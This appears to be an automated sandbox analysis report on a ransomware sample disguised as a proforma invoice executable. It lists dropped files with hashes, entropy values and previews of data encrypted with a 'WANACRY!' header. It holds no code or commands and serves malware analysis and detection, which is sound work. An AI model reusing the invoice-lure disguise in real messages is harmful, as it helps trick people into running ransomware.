                                                          SHA-512:E269EAFDD49E1952819DB5917DF8B5ADE7F3DA44299456DF924A3D9CC0B95D1D7327D2F08D6275FB9CB191E2398F36E8AEC2007F0968D9C3C1E2402AA6E8A78A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.072244857653795
                                                          Encrypted:false
                                                          SSDEEP:6:bkEST0osT9ZnVEAnTEF921HV+//IbsZqMkPyZhGtFW9zRORi+GDRzM/b9DDi:bkESTLsT9ZV7TzVhe3kPKhAsOSzgo
                                                          MD5:714861836C8C711B1A6B8B9E8B40CF46
                                                          SHA1:ACF91D54CA8C128D6D89BE2A911C7A4DEB08B01E
                                                          SHA-256:1EEED76C8D8A3FE0D27B33FF3934C7149DE0C4EC1264C36E4867AD7131E9E4F2
                                                          SHA-512:1683F753F203306FC6B94835AD40B483262D91DD7DB37421780699C30FE10FEAFB465D33C4ACD45F314A0D6615BD73E46CE7C7542733145B9F43520CE15CE6F5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999855684177184
                                                          Encrypted:true
                                                          SSDEEP:24576:Rwvs5QUfOYHba1iF0eQ0In2rdOj8DT3zHi0RuMId8ie2G:H5ZZFF0La9DT3zHi0EXCPD
                                                          MD5:2871DF3305924BF43FC104F5212D07C1
                                                          SHA1:592FAEBD14F472AEB04770E1963536044C844455
                                                          SHA-256:9729B65324A27C27C0E048307E45103F4A9DE39CE4C6CBB493E07618CEE83D6F
                                                          SHA-512:204F58653254B64C75BB08D4A6F0A0304E73BDB967F86ABCC9726178BC5C0C40FBDB6FE34FBB5257FD4F469A2725D0A8CD5320939E226F71187E4709D1236C63
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2680
                                                          Entropy (8bit):7.90764841043664
                                                          Encrypted:false
                                                          SSDEEP:48:bkcMk01XcSJ34ormNnllZdgVDWx9Bm6e+MzvqUJFwgTJtyS5cDypGfBZknOSw:ocMkyX53/rmNll7gVSx9fe+4llTryecD
                                                          MD5:D10288ABAC79A0D5382AE788CF2BE971
                                                          SHA1:E795BE2F65A7DB1B7D4A0BCB1DCC57447824D0EC
                                                          SHA-256:38240E2DA3E8FCA1C1A71FB5174ADC89637D917D46344A61FD8D076647DF6D9C
                                                          SHA-512:5E618C44456E8E79215ED5353EA13580867A19C94A80F715644FD1B815D42D16EBDF469DAC94F24717BB63CB97E913759C14DEB8F8EF49889DCB4813A04D9A24
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1912
                                                          Entropy (8bit):7.8974741084021645
                                                          Encrypted:false
                                                          SSDEEP:48:bkrDU98ksPjq9uz3GP1+rL+itv3vsxFPzX9TCOueI3hlsODBoXXl0LPYm4+XE:o/UqPLiuzy1+XFd0xRyeI3zsONa1yPRU
                                                          MD5:D38E41BB0FCF063C0BA30EA394EC89CE
                                                          SHA1:8E48602FD20A41CFC01860ADE158CB5F1EBCF153
                                                          SHA-256:910F79A14D7527C880D7458A82CF85ED805AD233D5632F741A3BD55C5013AB2A
                                                          SHA-512:C97BA63C34FFDD9314AD639CC6C318A924E15B44929EDA2C7A25D02B72ABE354CE262B213572953A531E76898C5DF6F7A2BE35EEC8E4C97F615D0B0D3F152346
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2696
                                                          Entropy (8bit):7.929726783415007
                                                          Encrypted:false
                                                          SSDEEP:48:bkP1z3qgWHaA+lpjV6Ut0nbwZBE+XTQ78dWhdU53fO4KYinLnvQ+cl:oP1fvV6UtAbi878deu3fOBnnLvQl
                                                          MD5:CACCB8688BC0F398BACBC6AD24B569FB
                                                          SHA1:B6514A3450241F8C69F0F2422DD80F9134F68858
                                                          SHA-256:5AB04B21904C28908FC186028117F191585714A80001F43654420448FECE0916
                                                          SHA-512:DD3011799D154148D39D0BB2BDC2DBB57119CB6F17E1E599318909EA419FC47FD64C5034EBDDF7911F096E2B264DD51B4DBAA5102244ADBD96579611DBA0AA1B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...........7..u.V.<.g ...T...pX.he..m.B.x.k..T.p..w......l...b..J..}{....,.~......O..ME.....=E.....W.p...Z..!.g0..|....N.#.Z..LY......o.$3..M.\...o..7gB.C...u1J.g..&.;E......%.....Q:......X....0i.#..;.....aX..!*h.YM...qd .....F...c..n....@.]..+.z....a........f..;....U.]..f..D..</......y[.>.O.}.l.!-W>.!?M....mX..W.......k..._...c3.IoY.t.nfZ....%.6...@.i7...(..&.-.oi...).T....7.x0o.........!..%rA..9G.....;............Yh.E...Ys`........[...Z...wW.X.KfY.....k.npL|.Z......z.@. T.....'.E...]..M]aQq..dP....CuIT=...$.....C..x#i...mAC.=3p...6..4y?.....H.N.-G.&!.(.eF..+..k...|..q...r...ZY[.(2..A..P....S.=.%Z..^....=.....P.WH..O_..D.P.f.,...9..#...R.......,.m../..P.vw..tx....R.lND....6h4.........il..;....^:Q..v.B......?+.Y5.....Zb.....w.4.B.._..MD.K.l..oI;K..+a..D..B......$......0...@U.G.-E..0.s.@.@..o....As....[#T.O.f.v.......ImmAq~.8JL.."G...?....e[.4..<...x.>...3.I.....i.3/..\._f.N./.@.\OYc.....Vf6...&...`.......n..$...Z.:wR....m.K;>
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1864
                                                          Entropy (8bit):7.903903710028022
                                                          Encrypted:false
                                                          SSDEEP:48:bkXNc/dZOgMCXsqw5mILCg6ZhE+dnViYUznXXek6kHzDefy:oXNc1ZOgnsqw5mIL4Ki4Yy/+y
                                                          MD5:8311DC05F2CCEB90BEDB407CDE36C006
                                                          SHA1:CBBDF231D2F88AE5DB3DAE561939109978F33B01
                                                          SHA-256:4A094DA51AA4F7F03CF0BF70E83B7C067128A184D0E79F28CEB6C5FA6F4F6E5C
                                                          SHA-512:EFADD5C7F22BAEC6834C768833A0BF737AB2C537B36897B38BADCE7917A6603D423126A016EAACD087159EC5DB0921D6CB67C66DE814CE1FE945DDBCDF8C99EA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....m.j.y.b.X.Ov..@.HhT.}.D.{m..i.."a{u.MZ.-..@.D._[c...9;.............^....m52W9#...!.wK.m.iq.h.&A.'..o[; .P........%{3.w..z`.^.f.......@._.V..dQmzRG.h....Z...1.ESz.#.@}..........F..{.,..>z).....].B.l..O.....).7.E....q0..P...i........z..hf...-....J......).......X...H|?;.SP...2.+..'...<......~b.;.,D..P2...8.::.(.....vHHS.b*,.!..c....._.Dx..M?.d.V..w1t.ei....,......Tw....z..S.pca......~......Q.Ks$.o........I%>...V...\........T...#E...D.....]..I.].P......@..L..J2<...Ta0....-..M.Gb..@.Uv*Y....H&B..b.T.t.Y... 7.d.e......\..F....t.z.&a}E_.J.(../o...(..=....~..8&_\..y.....%.....5jO.a...`..I.E...}%.h....U.7..s^.....R[.zK._..9. ...`.9...q>.&..iFo5l.v:.?.U@C..n..2c\..]g.um^...liT...O..7Yy.>.Z.$I.....*t...9.$..^0....|.............C.a..eMp.....s.F.}..2.J.G......=.bM(.j[...$._....z.<....]..US..k....8.jO.......).'.. .h..f.....<.).U.5..}..J(U.}.<7V...1q/>...y\.K.PH)U.&..?.:N.vl.2...i.F.b#<..D..`3Q.S(U.d$...Jy3..<V..'.t......uD.{..=.0.u..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1848
                                                          Entropy (8bit):7.911577303740036
                                                          Encrypted:false
                                                          SSDEEP:24:bkCLS0bYmQUUgLW+45/vhvkzl4PKRLSEWb8D2ibDFgqi6862m7ld9TqkLJ5fn18M:bklwYrt+LgvhvkGTIC0+47ljjL31LZZ
                                                          MD5:1382498246853DD53F003175D35603E8
                                                          SHA1:DC4C8128090F800B499D05DD5905E30846338249
                                                          SHA-256:4E62588C98B1BCD113E0BD166899900A144DF53B98F206468AF203F32C508FA2
                                                          SHA-512:EEB175F502CD0902B5168748A417924ED0F1CF4C395F462ACEA352A0081B86F76149AAB3E8C51F397EC7EA4B23974B6701DF0930E17456EC9D6D39EC9C2EF025
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....P.V.d...>...u....<Gr...,.../.n...\v^...@....{hR...."....p(}..S...h.2.....a.&..b.......pD..........}...C8....J...J)..g...A..~]D."(rsh[......1...T......W-..n.Oc...X..Q.t.......P...L.0.q-}...y....>..=..&J.z..._.[.!..C....k...7..Q%'.g...1.=................8......'.N....6|v.,.|}H..sB.#....@U"..,*..Rxm...[...C.x.R..V.....-.Y..........d.&.J.5.z....sm[...Y8.i9X..d.bm.......7..l..n...;....9 ....+...R..H......qRI..EM.{.%(A.ghp...7..0.... .ly..L...ol|....O.../.(....T}..R0..V.....6^.y.;.......co.rEF>.03...OO...I.@8R|N...p..XM.f..A........lq....!A?g1P..D.ux.1..N.G.....t...`j.....4....<J[............0<.M........@....hl.d?........[.g.U....w../_A.:..-......!... z...f......gI.v.....0..D.x........I..'h7wd.8.D?.D...T...@S.....p....6_..2V.....=.......^)U.g.....x..SA.UYl8@:.TS....^B.Fz...f........i.lm...aWV...... ..C4........k..BZ^9fy=N..k;..M....2.2@/y.2...l....1./>..........u..P!....1.?jK...^r..+..X.=.hF.3.........31.l.......u.=...0.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1400
                                                          Entropy (8bit):7.858733697729163
                                                          Encrypted:false
                                                          SSDEEP:24:bkojghEGKCuNYtX5hZg7eo/6UpJ0Of3NatdMJQNP9bTOd8XATaDP6H:bkThEfBYR5Dg7j/7Jd3ktdTNVbTu1+Da
                                                          MD5:3AA011D492FFC36B910938E1E7BC6BC8
                                                          SHA1:E7A345AAA70CA469072B3FB6BBE8ED2E643459C9
                                                          SHA-256:7704C5ED533CA576652C32FAB8D452E630810EBE3C04BE10C9D5B14CB5F977CB
                                                          SHA-512:78A38384AF6A379D4CB22AC91E8319CA25DCF5E904C29A06676FE6F68E1DC1F2A5DF8130E5810BEF7DF83E793D42E2053DD7E1FACA11455D7805396B58285E84
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!..........(....l..S....q~Ff.H..Qr....a....T.i..dn...b.].T.dfq.[J..)bp.q}J..0...HFX=.}...+.9.pp.3..W.B..._.....[`....q..{..--....M.0.F....6.G..\........a.].7 `.j.....%...M_......U..L~..._.........@.f.O.v..Yn..6k..bu.U.g^..9.J....%.W'}...#3$|.r.nJO....Y........2.n.W.'i.Vt.ehT.....Q?B.y........ .a.....e.}..N|...;^.t...1nVh. )t.D.v6!..(=G..,l?....\l.*..U..#.;.......gA$.}..f.J.f...6.."8..h..R..K...FS..v.f.,.OJ..[.....eKd.N..7i.*....!...Q.\*E=.+I8&X".x..?.%..a.....g...$.].s...d.r...6...Z.../._._....<c7.t..#G.._...5.Wq..(\%.._R..W.D...7.Z.0n...6{.pA......?..P.@.....).K.CN..r..:l..9....v...B.\20....V.>...]`.9.&mb.....x.M.M5...!.$...>..-.R..._..w&.hF..e.4...w..<aCW.....4&_.}.. ..rL..K.`..f......?*'..&.n.I..K.#.C.....f.M.@.$..d..;.z).69m.`6.......f...'6..at4.A..6.Y%..X.......f\Y.&.:.0.&V...UGt.%..o...f..5..9..&BOS...L..w...Z.w'~..{..G.n..3.k..R..<.N.}..a.^Z..z#....$\..(...];.c.....p...&...m.G.......w..-$\-..K.m....,.....)hE.......0..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1736
                                                          Entropy (8bit):7.876582738993397
                                                          Encrypted:false
                                                          SSDEEP:48:bkdvDIyR8JTorv5Dc8q/YcG4LdlWh7h5Ft:odvDIb2rBvq/3tdlu7rr
                                                          MD5:AEEC5A9E6E81858DC4326BD7453539F8
                                                          SHA1:5DD2243174509E38BC463ACA65B0DA66F524F31A
                                                          SHA-256:DBEF83841103C08E62AC4EE9EAFDE0815565B9C4A9FED81A9AE983F8CB5C7D22
                                                          SHA-512:63D31337119B591C0E81D56B2858A4D4DEFBC934073394EA876069A3A3CFC34923D258FDF3FC234E05D6A4598ADF04D7C0EB128DB5960FDA7DD136FA32A99E57
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......L6z.Pv.V...=......&.h..). }....U..z....,.......2....~.&9...e..._.r....gU.1...6nG.y....._..-+...........W.xAeY...F..X*.a...U.\....?...!.L..h."a...... .!QzB..@&u......>..3..s.O..9...&:........$]...X.2...JQy.&.,o0'U...".C~...8U..?.......S..[qz9H............^\.w:..9Oh....]...f.(.dl. ..s...J.K..E.....ex{._.....]..9.|.Q.W.....x.N.v...pD.s0@..C.h.QM..W9..#o...X.\....(.J.7L.l....w.A....Z.......4...Y7.%.f.wsT.......x"..NP^..k.b-...d.wf...+.0.Ty..&Z/.......z.Y......[.....&.X..[.hL.zb>K3T....}3...3L...8.qU./B.p.`..6Z..~.H.....T.<.cg..K.[.~.f..T...d.P2.8 .Bj..F%.Rd.j..\..C..t...#W....I.i...~..Ex;D..h.IW/NC....wI...wR%....u~N...#%6B...m. .O...S_..g.T.*r.^ynit....2......3..._.........8{.....%L_...m..@.hdOA...xKm.^OTb........-?.1.2.-.#..l..A$.[..v...qC../;.......s!B...5.E5.|.4..n.....WX.~.u.6..MJ...8.<.mV..............".*.......v.v)7......}...{T.!MrAP.n.,.A6....9..U.V.1....}Tm...`.8.R|.B...).....=..,.p.l..]D.68...@..L[...s..x-...!.....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1352
                                                          Entropy (8bit):7.856238185473883
                                                          Encrypted:false
                                                          SSDEEP:24:bkcft/B6o5qF20+z5YcrPTevtMjVbrT7vmPyGKkDuV0ugfrI4V2KKU9yabCv/wEX:bkK5Yf0Xz5Yc3eS5brPvmvKkSV0ugfrO
                                                          MD5:FD49F28649409E3AC20D5876EC000376
                                                          SHA1:CBCC570A1F9A70EAFA3DD924A7A4DCF37A2A7463
                                                          SHA-256:4743E1EBAE96A17A09EB56DBAAC373DD558E93F4ECE8CF7E83AFE24481CD6616
                                                          SHA-512:2CCEDCCB0450190699441113BF4D1A542B0E4051F183B7384E6D90035EDFD1C3A58A5D6A26FCDEB5943B8834F4E00B2B92901BBDC9C36557BE225EFFF30E0330
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........../..z.m...@.6.|.[....nv...!.xe\..a.u..$....O~CU.`N..2.l.f[]... -".....^...\.B.^..Hh..F..Z.e..DFiR..v........:BU~..Y...8.5.*y|p.;..^.&6.>EK....2.s!d.T..t.+.....w../.?..6_.x.f..q,.5..p.*......Z.?..w.g..-....|.v.._2$i...BH=..d.$k.1 {'....t....$.........R..R..8`S^..e..Uy../.n.^h.dY.......7...!u...t...v.pm...}.:..K..H....`..S5........M..... ...n....!........t$8L.+...+^...].G..M..K.].oj.'..I....J.]6.........<....Xf.....@8.YSc......j...I...Z.....Z..Lh~.j+.pz.[....fl)J.:=.RW....q.`.y.QL.....\J...B..Z.y...2#..~..6F....8k.r.m.b*...f.7.L.=....:g..XNmi{.dUP..........Q.m...+...v.M.a|..3.0....%^.NUYh../.R......=..O......[.Bx....L@..4x./....c.K35.-.....4.n.=..z.6...,...$?...#2i....6......~..~.5...,H..."....Z.d...#c..q....[......If..t.PF....'...u.0..Z.e..5.4..%....7..Iv.E.o....H..0...).9........t..?.sJ...-..r......6..>[....`....Ga2.m..d."..VN.......9W.....4..S.r.gm...b0.K....aYO"^.5/.>YP{d.c1....6.".F....f........j12....u.It.V-C0
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11880
                                                          Entropy (8bit):7.98414820142224
                                                          Encrypted:false
                                                          SSDEEP:192:uPSaG+TEzFviEkpEW+HiGd1KjieQnHCYA2qnDTNVjj1oZOX++TQWcGgZc2ChoYNP:uPpkFIEW+SieQHCY7qn3NVjj1k62fG3P
                                                          MD5:B87097673B7EBED7344EEAFDA5267FE0
                                                          SHA1:E7E97BF9A5B94F36F4BC6D848F96F83F6B9B5C42
                                                          SHA-256:9EB27DFF06BF787E40E94DB19F9842BC4B2445252647FBC3FEF4C7F76C8A855E
                                                          SHA-512:42B097661D8B6C0A9DEED0B20259DB7E193DEF8BE6A7C0F129C055C356C757011033DF401A65FB6993F8D856F95C5DA9892B0177E093FE366F48FF096C2D472A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......}....5.k6o...o.!h...V....|f&RK.y....j..9t.<|SD..P.|..^..S.....\..*.'....a..,..74.....N..\Z.Ty.&..d......r.W..1...#.\......LU.M.i......]..s.}.nD.>.`x.*D..)V.........,\.#y.y..NOW{......X...k..G.V..qILs.z@a.'..|../.>..W..........Wr6.~.....#/...n./....O-........ .o..A.^."L.2./..U.id5Z.b.& 4..#I.f.v.........O..".B7[.....V<..s.r/d.#9"..@,....h..`jn$.. .....8...-...Z,9........{. ...<lm.#.cI.0.....Uh...exhxBtI...O.c......E...H..t#...!..,.:...A...j..T ..t..;X.......tJ.!..$..xS..s.f.>.>.#)9.7.....|....c.&t.?......O2.D.bj].*..c.JP...L.Z.Na.I....)o..<%.....O.X_.V}.....SG.(..B"...tL....J..^A>.1q....W)..q.. ...kC.(.Y.#1..%.$.a.j....1k..HFZ.GX.2...Q.Y..4....\Q..?.......w.}..h....].../o...E%.5..W.=..%.....dxsk.JF...'...`o...+.W.._os.gY.a1..u..E...U...tW.;bX....}.. ...0<w..lg....V'..Ez.2...&.'.K4....!s3...+...1..,...NCE...&H....*..J..Dt...~...W...J.E.,c<....1.9.<.hRf~[~!...............$.........^..h....N........jX..6...Y..x[.mBA1...[.}}'\.T.@
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11880
                                                          Entropy (8bit):7.98414820142224
                                                          Encrypted:false
                                                          SSDEEP:192:uPSaG+TEzFviEkpEW+HiGd1KjieQnHCYA2qnDTNVjj1oZOX++TQWcGgZc2ChoYNP:uPpkFIEW+SieQHCY7qn3NVjj1k62fG3P
                                                          MD5:B87097673B7EBED7344EEAFDA5267FE0
                                                          SHA1:E7E97BF9A5B94F36F4BC6D848F96F83F6B9B5C42
                                                          SHA-256:9EB27DFF06BF787E40E94DB19F9842BC4B2445252647FBC3FEF4C7F76C8A855E
                                                          SHA-512:42B097661D8B6C0A9DEED0B20259DB7E193DEF8BE6A7C0F129C055C356C757011033DF401A65FB6993F8D856F95C5DA9892B0177E093FE366F48FF096C2D472A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):20568
                                                          Entropy (8bit):7.991867390120489
                                                          Encrypted:true
                                                          SSDEEP:384:bdGycRSfoXwbU80vIHrJQoOzBkELFXVEy//uhngFW:bdGyhf4C1oI2oKu8Fld/sgFW
                                                          MD5:FDE241144C275C6DD4E5D4BD09A023CA
                                                          SHA1:0D478D9F91509A12FA4173E45C11FF27B12A390D
                                                          SHA-256:51D50105885A94242A520A9BF38CFE4525E8445FE739FCB3F07EA6514B296B70
                                                          SHA-512:3F0E5A05758BF3D200838CC8239AFB2B751386ACE36E55078EC6EFD8C8DC886A739716578C16CBCB84406A4E5CC47124635DF60138C0769491F75097966FB7CC
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):13176
                                                          Entropy (8bit):7.984407493127241
                                                          Encrypted:false
                                                          SSDEEP:384:Jd1CfXv2vuxl3LtyiRED9N6akP9L8LNuCGE:IfI4l7hx8YCGE
                                                          MD5:D93A389BDBF01CF3536CEE86EED8A1FD
                                                          SHA1:12DE75D7BC8F672D8D25240CF5376CAA53A1259A
                                                          SHA-256:0ED5B29215FBE94D84BE0AD02AC0DFE3BF85D766812017A1C20E518A5E65498B
                                                          SHA-512:36CB6EA530565E465571F59F3A8F89140C15C649633FF87CA6F26B4D4292B2B19B489CFB2BA7736D5FBFB80F298AB6C2457822DC3CCF99148F7777AEE4789A0F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):36264
                                                          Entropy (8bit):7.99525127512748
                                                          Encrypted:true
                                                          SSDEEP:768:35XTr92JFG2cwsiIGBa6i3OUhCWhTuwwNg8+qYg0iakIEiVH9YeZK:V392HGc9IGBaLxRhT6gnieR9Yv
                                                          MD5:E38B55A138F130687043C4137520C383
                                                          SHA1:4ABBEC721E1DB5F37D040480766FD70856AB7D02
                                                          SHA-256:D7DAC6D0A27416A3873A4B80EC375B47E1D5DB3BCC8495D2F3E5C75FBED577DE
                                                          SHA-512:1AB0ADCE244CBD9026843F1C941FFE10AED6FC5AA7213E416DC7DB696FD07BB7D09C3F97EDB6093CAB185692D10F22EA38B886B420F35D9BC52118A2622B8D00
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):21048
                                                          Entropy (8bit):7.989688780000734
                                                          Encrypted:false
                                                          SSDEEP:384:uolDjOvPpqNEDM5G67K7reddTioC+GGuGastTAwDWE3UPqvF/uFM9PujhPj:uo9joqqWG6m/ePXBjjtSDM9PkJj
                                                          MD5:EBE24CFB6D90E796F93954899B86FD03
                                                          SHA1:4F52BC82A2FB0047088009270C824969688BC6EB
                                                          SHA-256:6A75940E06BC98C42A991808F3B860B5E76407BC8D3B13EE0630C024FF46C20F
                                                          SHA-512:06B82EC41311F96C7F0DCAAD6E063D1A1055764E4C803480C418BBF94315F8387EDA8A4796EFA73233A1D2CB65860816EB850360C7EF479E6C74F6ED151CC9A1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7304
                                                          Entropy (8bit):7.975669041076748
                                                          Encrypted:false
                                                          SSDEEP:192:mBEhFlyR0oyE97aDKOeK8CQT03Qx7fBcdiCStj4an:eEhFlyGEQzeK8CbQx7ZrCStH
                                                          MD5:DD85793535191516B6ED4C9BD353EF6E
                                                          SHA1:4AC3BD53973A75BA347A7E0C3896C14CC72DFDA4
                                                          SHA-256:C4920DCB14844ADA279EFE59468059B5EE13B4EE94B99AEEE053DBD5F158134A
                                                          SHA-512:BCAB937B43D13173CF46AF11686D9575A648F5A6CB6E4B7E95D24FA48E777C5788BDD2892F0A2B4686DCA78F4E99D767E47CADEF1844905C295E8D087871E894
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):80360
                                                          Entropy (8bit):7.997936750840787
                                                          Encrypted:true
                                                          SSDEEP:1536:waCNaQxdakfQUkp7c3/S2gT6lHgymDujTETq6RfzQFr39/ijMCYP:waCUQxdxQUkS3q3SgynfONzQ//iwCYP
                                                          MD5:818B927FD8BC1B2044F8C1047FCB40E5
                                                          SHA1:D03932B26E79CD4133DBB8DDDCA6E9E95E998D13
                                                          SHA-256:AA3F60C2D75986B686C6A3C4721A50C23D938213F8502D95D52073636DCB6082
                                                          SHA-512:BFA42AC2FE4BDD184BA7050F2D86EF3938C3325991B30F53E12B008AD816560D2D4ADF5B8E36FA36C546DE495259A0622941A79BB7EC55A40B10E32CE3030680
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):43880
                                                          Entropy (8bit):7.995194162208107
                                                          Encrypted:true
                                                          SSDEEP:768:Z+YrxUN6FCLE5+ruZD+hCdCMS79HZggDCRZO984IHKEwvRUWQ/D2fsg5eRHV:Z+gZFC0QOKLDR5g/wUHKf5BQiUg5eR1
                                                          MD5:D1CACEC8740292398D6A54EF944A2590
                                                          SHA1:2BA6C240F893DE707421F3F8427E96B515EC4F6E
                                                          SHA-256:3539995A7AD37D802715A051CFB94719F80F0CDD707CCDE1CC318B933C7A8E70
                                                          SHA-512:1252ECFF90275215FEDA9C6372B9C14BCA6BCEA3F26B60EC8A8B596ADDE4DD4C776D6D4420A0B156190FD6456FE16E0A46234C7CE5337920E61D4CDCD968EBA8
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........la..**.g.....SlI.%.[pK..b...........v..f...L...+.@..x.I......7F.N2.6.......7..+..B....4..._.;...5].B.;{..fA*.i.4.:.........tJU..:...Kj>.x.;...#.?..4.....^g!...<.......;.y[.JRj%n`}Q..6.w;,.D..?..-g..g4q...^....{...p_...U93H.5D.wu...8.n]....H...........'............Lh..'....]<p..X=...:...........v..".L...i....>.!...x0..'......2.5..Kn...o.H.'.?-i|&..U..E.ye...i@.......sX}.|.3...\:..;sSD.......).k...2..;..%.:.W.#.+.9..U......~xV.O~4...x..G;.....r`..X*..g..J..E.=r...g.KB..,A^..s..0...../.)...:....-u..z.....h&./.:..F.."..\~.Q.3.}......|.7.E.....j=...[6U...........E....."...eb......b.nu.]..O.q..Fwm)P.h ..<.2.H...._+6......X.ST:.....|...Cq....R7.....p...7...&#X........X.F...rk.o...$.e..a......I..Z.V.uy..39$.....W..^..6...F..R..=...Lb...JGWe... M<....!.5F..j#._.t..v...+'$.P..J.A..."D@.....$.*..kJ..3.9.-.#Y.T...d..o.."=....I.q.....zW.D.j...!..S.=..T....!.....3\.i.Gh.......?...i3.....VI.......v..'|......^..M.l...^.m...J
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):584
                                                          Entropy (8bit):7.556160222280445
                                                          Encrypted:false
                                                          SSDEEP:12:bkEC+/7XUHxpX2t522qw++ijqb3ClhwJTlmL0Muy4o3:bkvxpGt5Ojqb3Chw1Oky4o3
                                                          MD5:7E4478281E6DB69574C8467853F5FEB6
                                                          SHA1:A8DE16794F1A6DC64D1574A63CBD3E6734E5E819
                                                          SHA-256:D25AA0D0A74EB308B0D563200E9354518ADEE7FFC3583913BC3DB236E2F646D6
                                                          SHA-512:D3FC3777DCB4B3756E270DA38A7858BC4A32BA61E1A2C10DF465532E5917FC7BB074C298F347E16D5B34541C5CFD830F8B0B4A7B640A19A9ACE6BCF267F5AD91
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):138488
                                                          Entropy (8bit):7.998652014501591
                                                          Encrypted:true
                                                          SSDEEP:3072:fB647rfbMxm8bB/PSPRHA79rruvO0ltY6aqf6Y73gwCpB0YYWgpuYKvKM:fB6sf9E3SPRY8W0ltYJqyYjYBqvlDM
                                                          MD5:FECF657BE420045A5967DCA9142F55B8
                                                          SHA1:C4CED122997F57C5C7D7D2BCBF88683F9CE80232
                                                          SHA-256:F4374ACBCDBB7FF065C56A0EBBFE1F6F752A13BC02F081515D29AFD0A437CD93
                                                          SHA-512:3593690B8647D0494BA8F2411E7B1E7416D1030DB43445802536D6197D6F79E91804CEC10D61F9C371EA8F5D2F61F59863A3B1998EBE92604B6083688230B537
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5096
                                                          Entropy (8bit):7.964874503639336
                                                          Encrypted:false
                                                          SSDEEP:96:o6kun0+cpmgUc3ZB6W/cbeZD/Ffmbr+YqijwiCNiaunn:sZ+4Nv0bmNIdjwJNiaunn
                                                          MD5:5FE2161453DD8B23DF2D3FB705E5B802
                                                          SHA1:C968AE19E16861D7E9E0178E789A41EE6EA8F695
                                                          SHA-256:7EB90AB06A53BB715B8E8FCD24E238735B8EE940894016BD92E36425DAD467AE
